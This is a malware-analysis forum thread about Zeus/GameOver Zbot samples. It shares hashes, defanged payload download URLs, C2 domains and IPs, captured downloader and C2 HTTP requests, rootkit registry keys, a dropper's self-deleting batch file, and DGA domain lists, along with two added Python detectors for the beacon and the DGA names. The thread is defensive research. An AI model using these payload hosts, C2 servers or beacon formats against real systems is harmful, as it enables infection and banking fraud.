Page 24 of 29

Re: Win32/Zeus (alias Zbot)

Posted: Fri Feb 28, 2014 4:06 pm
by Artilllerie
Hello,

I worked on a new Zbot sample with a rootkit kernel driver yesterday. It seems to be the GameOver version covered by Sophos today:
http://nakedsecurity.sophos.com/2014/02 ... e-rootkit/

Pass: infected

Included:
Avis.de.Paiement.ex_ (the dropper)
evedgu.ex_ (the Zbot sample)
e37aba293ddb236a.sy_ (the rootkit driver)
dumpinjected (dump of an injected part (WriteProcessMemory) targeting explorer.exe)

Re: Win32/Zeus (alias Zbot)

Posted: Tue Mar 04, 2014 1:48 am
by sevatar
An EK dropped a loader earlier today. The downloader attempted to grab these, at least one of which appears to be Zbot.

https://www.virustotal.com/file/d25f1e2 ... 393896773/
https://www.virustotal.com/en/file/e048 ... 393896775/

https://malwr.com/analysis/MDRmODY2MGNh ... UxOWM2YTY/
https://malwr.com/analysis/NTI2MzcxMWZj ... Q5MjJiNTI/

h00p://www.del(.)hr/hooted/dogmatics.exe
h00p://twiliteorchestra(.)org/suharto/stropping.exe

Re: Win32/Zeus (alias Zbot)

Posted: Tue Mar 04, 2014 7:57 pm
by Xylitol

Re: Win32/Zeus (alias Zbot)

Posted: Wed Mar 05, 2014 3:57 am
by sevatar
Low-detection malware that appears to be Zeus.

https://malwr.com/analysis/YWI5YWJhM2Zi ... I0ZGE0NmY/
https://www.virustotal.com/en/file/ea7f ... 393991596/

Callout domains/IPs:
xifvsxcwtguwytaypaeqwzh.info
hnbydivjbswpyhrkzinrwtpvgqnb.biz
zhmbmzpwcfyxwoeuhalnjojwg.org
50.116.44.105

Re: Win32/Zeus (alias Zbot)

Posted: Thu Mar 13, 2014 4:10 pm
by Xylitol
Thread split to make a dedicated topic for ZeusVM.

Re: Win32/Zeus (alias Zbot)

Posted: Tue Mar 18, 2014 9:08 am
by unixfreaxjp
Same variant as per posted here: http://www.kernelmode.info/forum/viewto ... 230#p22324

Zeus/P2P GameOver as a PE inside a zip attached to a spam:
Image
VT: https://www.virustotal.com/en/file/d866 ... /analysis/

The attachment drops these files:
Code:
2014/03/18  08:26   56,832 b5156.sys   a2f2b24bd6fa13095c319f7f61c21d2f
2014/03/18  08:26  611,840 lirea.exe   37cb6bf5bfff4c83558b83b858749299
2014/03/18  08:26      132 ZPE7CDB.bat bd4907c94f562da6084f5c3b9bcfe7c5
b5156.sys is the rootkit, hooked to:
Code:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_B5156\0000\Control
Name: ActiveService
Type: unicode
Value: b5156
VT: https://www.virustotal.com/en/file/f147 ... /analysis/

Usual auto-generated batch file:
Code:
@echo off
:d
del "C:\securedoc.exe"
if exist "C:\securedoc.exe" goto d
del /F "%Temp%\ZPE7CDB.bat"
A session of CNC callback traffic:
Image

Posting this command & receiving response:
Image

Post in Hex:
Image

CNC domain Information:
Code:
aulbbiwslxpvvphxnjij.biz

;; QUESTION SECTION:
;aulbbiwslxpvvphxnjij.biz.      IN      A

;; ANSWER SECTION:
aulbbiwslxpvvphxnjij.biz. 1800  IN      A       50.116.4.71

;; AUTHORITY SECTION:
aulbbiwslxpvvphxnjij.biz. 2588  IN      NS      DNS[1-5].REGISTRAR-SERVERS.COM.
IP info:
Code:
$ echo 50.116.4.71|bash origin.sh
Tue Mar 18 17:22:34 JST 2014|
50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | 
HURRICANE | US | LINODE.COM | LINODE
A session of UDP/P2P traffic (usual):
Image

Sample set with one session of CNC traffic + UDP is attached.

#MalwareMustDie!

Re: Win32/Zeus (alias Zbot)

Posted: Wed Mar 19, 2014 1:31 am
by unixfreaxjp
Upatre downloads new Zbot/GMO w/ rootkit
Spam:
Image
It is Cutwail, with this source IP:
Code:
Received: from unknown (HELO 18.98-30-64.static.virginmediabusiness.co.uk) (62.30.98.18)
  by 202.143.83.13 with SMTP; 19 Mar 2014 02:55:40 +0900
Downloading Zbot here:
Image
Header:
Code:
GET /images/TARGT.tp HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: jswcompounding-usa.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Mar 2014 23:59:34 GMT
Content-Length: 483608
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 18 Mar 2014 11:02:34 GMT
Accept-Ranges: bytes
ZZP..q...Z.....+...V2..........etc etc

The whole package, Malware family picture:
Image
Zbot cnc callbacks, same pattern as per previous case here: http://www.kernelmode.info/forum/viewto ... 230#p22467
Image
The text of the Zbot CNC call headers:
Code:
POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555
.&.......q..Zb.tD.,.F.......v1xr.<
\.=..+.,%.8oe.......'...'...R@.NSNhK'A
.<TC.OVF.I]D.:R7sK#BvNRO.O]F.f.........
.......}Y.....!0.@.0.lS.5.g............
...37g?3h.......!...!...
iL1xh..xhv1xhv1xhv1xhv1xhv1xhv1xhk.....
..........j..Nkv1xk9E.9f?xkm.......
...
...lt.rnv=xmv=.io.......'...'...
nv7xow6xnv1.jw7..v#xov7xov7xov7xov7..v# 
Zbot attempts to connect to the malware domains below:
Code:
aulbbiwslxpvvphxnjij.biz
aqxoythmntgevmjqsjrugdadhyjn.com
rwinsaewkqkrokrhucofaqwxwkv.ru
tcvkwsbqnjhjobgyttklnfxo.com
xohmozgqxkncqcmljrqsyllkrfy.biz
zxxpvolvljwkeuofkukydiugrwro.org
hgfuzrgylxkllnbkrvorkuox.info
desushrswsiinxwzprvogafml.com
nqocjrqxuknbmbqgkhmtoxpcu.ru
jbdswlfxvctooztvgjfdbquspr.biz
bywcdgijrswmbeulnmjsijcx.info
eqqcdilqbqfxspbecde.org
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
ztcpgudtkrwpzjrpcebaoxgp.ru
mptwtibibmrhqtobeizlzzdnfwc.com
xwporinufyfyrgdnvzplrfaofbpf.net

PoC:
Image
It seems like this Zbot wants to play DGA; two IP addresses are active now under ENOM domain registration.
Code:
aulbbiwslxpvvphxnjij.biz  50.116.4.71,
xwporinufyfyrgdnvzplrfaofbpf.net 107.158.75.30,
All are in US networks:
Code:
Wed Mar 19 10:54:24 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE
Wed Mar 19 10:55:09 JST 2014|107.158.75.30||30693 | 107.158.72.0/22 | SERVERHUB-PHOENIX | US | SERVERHUB.COM | SERVERHUB
Rootkit used: https://www.virustotal.com/en/file/f147 ... 395189543/
Registry hooks:
Code:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_242B8E047E8C5D29\0000\Control
Name: ActiveService
Type: unicode
data: 242b8e047e8c5d29
Sample is attached w/PCAP.
#MalwareMustDie
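
Added example for this thread, not code from the post: a small Python detector for the C2 check-in pattern visible in the header dump above (POST to /write, "Host: default", an empty Accept-Encoding header, "Connection: close", and a numeric X-ID). The sample requests in the block are constructed for the demo; only the first mirrors the posted header, and the body bytes are truncated. Thresholds and header names used as indicators are assumptions drawn from that single capture.

```python
"""Score raw HTTP requests against the Zbot/GameOver C2 check-in pattern.

Indicators are taken from the header dump in the post above. Everything
else (sample requests, threshold) is constructed for this example.
"""
import re

# Constructed sample requests (not real captures); bodies truncated.
SAMPLE_REQUESTS = [
    # mirrors the posted header
    "POST /write HTTP/1.1\r\nHost: default\r\nAccept-Encoding:\r\n"
    "Connection: close\r\nContent-Length: 326\r\nX-ID: 5555\r\n\r\n...",
    # same pattern, different body length
    "POST /write HTTP/1.1\r\nHost: default\r\nAccept-Encoding:\r\n"
    "Connection: close\r\nContent-Length: 12\r\nX-ID: 5555\r\n\r\n...",
    # ordinary browser request
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n",
    # legitimate API call that happens to POST to /write
    "POST /write HTTP/1.1\r\nHost: api.example.com\r\n"
    "Accept-Encoding: gzip\r\nConnection: close\r\nContent-Length: 5\r\n\r\nhello",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers) or None."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    try:
        method, path, _version = lines[0].split(" ", 2)
    except ValueError:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        # an empty value (e.g. "Accept-Encoding:") is kept as ""
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def score_request(raw):
    """Return (score, reasons): how many of the five indicators match."""
    parsed = parse_request(raw)
    if parsed is None:
        return 0, ["unparseable request line"]
    method, path, headers = parsed
    reasons = []
    if method == "POST" and path == "/write":
        reasons.append("POST /write")
    if headers.get("host") == "default":
        reasons.append("Host: default (no real vhost)")
    if "accept-encoding" in headers and headers["accept-encoding"] == "":
        reasons.append("empty Accept-Encoding header")
    if re.fullmatch(r"\d{1,6}", headers.get("x-id", "")):
        reasons.append("X-ID header with small integer")
    if headers.get("connection") == "close":
        reasons.append("Connection: close")
    return len(reasons), reasons


def is_zbot_beacon(raw, threshold=4):
    """True when at least `threshold` indicators are present (assumed cut-off)."""
    return score_request(raw)[0] >= threshold


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        score, why = score_request(req)
        print(f"score={score} beacon={is_zbot_beacon(req)} {why}")
```

The threshold is deliberately below five so a variant that drops one header still scores; a single POST /write to a normal vhost with gzip enabled, as in the last sample, scores only two and is not flagged.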

Re: Win32/Zeus (alias Zbot)

Posted: Wed Mar 19, 2014 5:39 am
by B-boy/StyLe/
Grabbed from an infected PC while cleaning it out.


Regards,
Georgi

Re: Win32/Zeus (alias Zbot)

Posted: Wed Mar 19, 2014 11:11 am
by Kimberly
unixfreaxjp wrote: Upatre downloads new Zbot/GMO w/ rootkit
It seems like this Zbot wants to play DGA, two IP addresses are active now under ENOM domain registration..
What's new about that? GMO always falls back to DGA ...

Re: Win32/Zeus (alias Zbot)

Posted: Wed Mar 19, 2014 8:59 pm
by unixfreaxjp
Kimberly wrote: GMO always falls back to DGA ...
Very good then; the post actually shows the know-how to extract them, which is the point.
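
Added example for the DGA discussion above, not code from either poster: a simple lexical heuristic that scores the domains listed in unixfreaxjp's post (the DGA fallback list) against a few benign names. It uses only label length, vowel ratio and longest consonant run, so it is a triage filter for DNS logs, not a replacement for the extraction the post describes. The benign comparison set and the cut-offs (16 characters, 0.35 vowel ratio, run of 5) are constructed assumptions.

```python
"""Flag DGA-looking hostnames by cheap lexical features.

Domains in POSTED_DOMAINS are copied from the post above (duplicates
removed); BENIGN_DOMAINS and all thresholds are constructed for this
example.
"""
import re

POSTED_DOMAINS = [
    "aulbbiwslxpvvphxnjij.biz", "aqxoythmntgevmjqsjrugdadhyjn.com",
    "rwinsaewkqkrokrhucofaqwxwkv.ru", "tcvkwsbqnjhjobgyttklnfxo.com",
    "xohmozgqxkncqcmljrqsyllkrfy.biz", "zxxpvolvljwkeuofkukydiugrwro.org",
    "hgfuzrgylxkllnbkrvorkuox.info", "desushrswsiinxwzprvogafml.com",
    "nqocjrqxuknbmbqgkhmtoxpcu.ru", "jbdswlfxvctooztvgjfdbquspr.biz",
    "bywcdgijrswmbeulnmjsijcx.info", "eqqcdilqbqfxspbecde.org",
    "oozovinytdpbbelsqgsodtsc.net", "gmqxkrkeaugifzaurtvhuqcxslr.com",
    "ztcpgudtkrwpzjrpcebaoxgp.ru", "mptwtibibmrhqtobeizlzzdnfwc.com",
    "xwporinufyfyrgdnvzplrfaofbpf.net",
]

# Constructed benign comparison set.
BENIGN_DOMAINS = [
    "google.com", "kernelmode.info", "virustotal.com",
    "linode.com", "wikipedia.org",
]


def sld(domain):
    """Return the second-level label of a dotted hostname (trailing dot ok)."""
    labels = domain.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def label_features(label):
    """(length, vowel ratio, longest consonant run).

    'y', digits and '-' are treated as consonants for run counting.
    """
    length = len(label)
    vowels = sum(ch in "aeiou" for ch in label)
    runs = [len(r) for r in re.findall(r"[^aeiou]+", label)]
    ratio = vowels / length if length else 0.0
    return length, ratio, max(runs, default=0)


def looks_generated(domain, min_points=2):
    """True when at least `min_points` of three lexical tests fire."""
    length, ratio, run = label_features(sld(domain))
    points = int(length >= 16) + int(ratio < 0.35) + int(run >= 5)
    return points >= min_points


if __name__ == "__main__":
    for name in POSTED_DOMAINS + BENIGN_DOMAINS:
        length, ratio, run = label_features(sld(name))
        flag = "DGA?" if looks_generated(name) else "ok"
        print(f"{flag:4} len={length:2} vowels={ratio:.2f} run={run:2} {name}")
```

Every posted domain trips all three tests, while short dictionary-word labels trip none; a real deployment would add a whitelist and a per-host "many NXDOMAINs in a short window" count, which is the stronger DGA signal.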